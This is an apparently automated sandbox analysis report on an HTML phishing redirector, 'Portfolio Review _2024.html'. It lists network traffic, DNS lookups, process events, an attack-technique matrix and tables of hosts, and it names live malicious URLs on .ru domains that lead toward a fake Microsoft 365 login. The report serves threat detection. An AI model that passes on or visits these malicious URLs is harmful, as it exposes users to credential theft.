Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: global trafficHTTP traffic detected: GET /hH7_CLfW8B06uDZbFmAiLw/ HTTP/1.1Host: ky.gurativez.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ky.gurativez.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: alternative-magic.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ky.gurativez.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ek3vzkjswtfz9qsulyl8dfg2k0vzr6roduverwk2jiyjrxfornrcjhcy.puabgqj.ru
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: portal.office.com
Source: global trafficDNS traffic detected: DNS query: outlook.office.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: substrate.office.com
Source: global trafficDNS traffic detected: DNS query: mem.gfx.ms
Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
Source: global trafficDNS traffic detected: DNS query: acctcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: logincdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: dc.services.visualstudio.com
Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 18:49:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4OquTXn5c8p0pa9DvAnIH7L%2BJGgcO%2BkhqV3ioqFhqtE2KX77RcIvfPhY%2F8Co5GsJbAM4gaKmfsuoxw8UMbaiqHQWn0j38R%2FWU6K4yG3p%2Bog7SzWn8D2kzdFV0vqGg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=55125&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1309&delivery_rate=52642&cwnd=32&unsent_bytes=0&cid=4c2a1f9c3d666c33&ts=207&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8e4a24245e571f4d-DENContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=22697&sent=11&recv=9&lost=0&retrans=0&sent_bytes=7224&recv_bytes=850&delivery_rate=563960&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49860 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.evad.winHTML@22/6@66/338
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Portfolio Review _2024.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1980,i,14726738063278741117,495290179614973699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1980,i,14726738063278741117,495290179614973699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]]HTTP Parser: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]]
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
1
Drive-by Compromise
Windows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Portfolio Review _2024.html11%ReversingLabsDocument-HTML.Trojan.Redirector
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/100%Avira URL Cloudmalware
file:///C:/Users/user/Desktop/Portfolio%20Review%20_2024.html0%Avira URL Cloudsafe
http://ky.gurativez.ru/favicon.ico100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
alternative-magic.com
69.49.245.172
truefalse
    unknown
    CDG-efz.ms-acdc.office.com
    52.97.233.98
    truefalse
      high
      sni1gl.wpc.alphacdn.net
      152.199.21.175
      truefalse
        high
        ky.gurativez.ru
        188.114.97.3
        truetrue
          unknown
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            ooc-g2.tm-4.office.com
            40.99.150.34
            truefalse
              high
              code.jquery.com
              151.101.66.137
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  high
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      172.217.18.4
                      truefalse
                        high
                        ek3vzkjswtfz9qsulyl8dfg2k0vzr6roduverwk2jiyjrxfornrcjhcy.puabgqj.ru
                        188.114.97.3
                        truefalse
                          unknown
                          s-part-0032.t-0009.t-msedge.net
                          13.107.246.60
                          truefalse
                            high
                            js.monitor.azure.com
                            unknown
                            unknownfalse
                              high
                              www.office.com
                              unknown
                              unknownfalse
                                high
                                outlook.office.com
                                unknown
                                unknownfalse
                                  high
                                  aadcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    high
                                    substrate.office.com
                                    unknown
                                    unknownfalse
                                      high
                                      logincdn.msftauth.net
                                      unknown
                                      unknownfalse
                                        high
                                        m365cdn.nel.measure.office.net
                                        unknown
                                        unknownfalse
                                          high
                                          mem.gfx.ms
                                          unknown
                                          unknownfalse
                                            high
                                            dc.services.visualstudio.com
                                            unknown
                                            unknownfalse
                                              high
                                              login.microsoftonline.com
                                              unknown
                                              unknownfalse
                                                high
                                                portal.office.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  acctcdn.msftauth.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://www.office.com/false
                                                      high
                                                      http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]]true
                                                        unknown
                                                        file:///C:/Users/user/Desktop/Portfolio%20Review%20_2024.htmlfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                          unknown
                                                          http://ky.gurativez.ru/favicon.icotrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          13.107.6.156
                                                          unknownUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          152.199.19.161
                                                          unknownUnited States
                                                          15133EDGECASTUSfalse
                                                          23.38.98.102
                                                          unknownUnited States
                                                          16625AKAMAI-ASUSfalse
                                                          13.107.246.45
                                                          s-part-0017.t-0009.t-msedge.netUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          23.38.98.104
                                                          unknownUnited States
                                                          16625AKAMAI-ASUSfalse
                                                          104.18.94.41
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          13.69.109.130
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          40.126.31.71
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          40.126.32.76
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          20.190.159.68
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          20.190.159.23
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          151.101.66.137
                                                          code.jquery.comUnited States
                                                          54113FASTLYUSfalse
                                                          142.250.184.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          2.19.97.194
                                                          unknownEuropean Union
                                                          20940AKAMAI-ASN1EUfalse
                                                          142.250.186.138
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.17.24.14
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          157.58.197.16
                                                          unknownUnited States
                                                          3598MICROSOFT-CORP-ASUSfalse
                                                          1.1.1.1
                                                          unknownAustralia
                                                          13335CLOUDFLARENETUSfalse
                                                          69.49.245.172
                                                          alternative-magic.comUnited States
                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                          172.217.18.4
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.110
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.18.95.41
                                                          challenges.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          20.42.65.94
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          20.50.88.235
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          216.58.206.42
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          151.101.2.137
                                                          unknownUnited States
                                                          54113FASTLYUSfalse
                                                          142.250.181.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          167.220.71.70
                                                          unknownUnited States
                                                          3598MICROSOFT-CORP-ASUSfalse
                                                          88.221.169.152
                                                          unknownEuropean Union
                                                          16625AKAMAI-ASUSfalse
                                                          2.19.126.153
                                                          unknownEuropean Union
                                                          16625AKAMAI-ASUSfalse
                                                          20.31.161.73
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
